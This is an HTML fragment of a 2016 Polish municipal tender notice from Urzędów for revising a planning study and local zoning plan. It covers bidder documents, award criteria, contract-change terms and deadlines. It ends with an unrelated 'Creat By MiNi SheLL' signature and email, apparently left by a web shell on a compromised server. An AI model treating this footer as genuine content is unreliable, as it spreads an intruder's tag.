<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A.1) formularz ofertowy - wypełniony i podpisany przez wykonawcę - zał. nr 1 
A.2) Dokumenty potwierdzające posiadanie uprawnień , pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 93</li>
<li>2 - 2)	długość oferowanego okresu udzielania wyjaśnień i opinii planistycznych w zakresie  opracowania zmiany studium i zmiany planu - 7</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający wprowadza możliwość zmiany postanowień umowy  w stosunku do treści oferty :
ceny w przypadkach:
a)	zmiana wynika z urzędowej zmiany stawki VAT,
b)	zmiana wynika z możliwości  udzielenia zamówienia uzupełniającego,
	
terminu w przypadkach:	
a)	 wniesienia uwag podczas wyłożenia do publicznego wglądu projektu zmiany planu jak i projektu zmiany studium, dokonania rozpatrzenia i rozstrzygnięcia tych uwag przez wykonawcę projektu zmiany miejscowego planu i projektu zmiany studium, oraz ponowienie czynności (toku formalno-prawnego) w związku z uwzględnieniem wniesionych uwag, o okres nie dłużej niż 14 miesięcy licząc od dnia następnego po terminie zgłoszenia uwag do dnia uzyskania pozytywnej oceny zgodności z przepisami prawnymi dokumentacji prac planistycznych Wojewody Lubelskiego;

b)   przedłużających się uzgodnień i uzyskania opinii dotyczących rozwiązań w projekcie  zmiany studium i projekcie zmiany miejscowego planu, z instytucjami i organami właściwymi do uzgadniania i opiniowania studium i planu, o okres trwania tych uzgodnień i uzyskania opinii;

c)  	braku  map zasadniczych  w zasobach geodezyjno-kartograficznych , niezbędnych do realizacji przedmiotu zamówienia, lub opóźnienia w ich dostarczeniu z przyczyn niezależnych od zamawiającego, o okres opóźnienia w ich przekazaniu zamawiającemu przez ww. zasoby.

zmiany osobowe i podmiotowe
- zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej uprawnieniami i kwalifikacjami określonymi w siwz, będzie również wymagała zaakceptowania przez Zamawiającego
- zmiana podwykonawców lub podmiotów  trzecich  na zasobach których Wykonawca opierał się wykazując spełnienie warunków udziału, w okolicznościach gdy, nowy  podwykonawca lub podmiot na zasobach którego Wykonawca  będzie wykazywał spełnienie warunków udziału, wykaże spełnienie tych warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o udzielenie zamówienia publicznego,  dotychczasowy podwykonawca
Wszystkie powyższe postanowienia stanowią katalog zmian na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
Przewidziane wyżej zmiany postanowień umowy nie wymagają wprowadzania aneksu,  z zastrzeżeniem zmian dotyczących terminu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugurzedow.bip.lubelskie.pl zakładka ogłoszenia, zakładka przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Urzędów ul. Rynek 26, 23-250 Urzędów, pokój nr 12. Siwz jest nieodpłatna..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2016 godzina 10:00, miejsce: Urząd Miejski w Urzędowie
ul. Rynek 26, 23-250 Urzędów, pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 04.06.2016.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com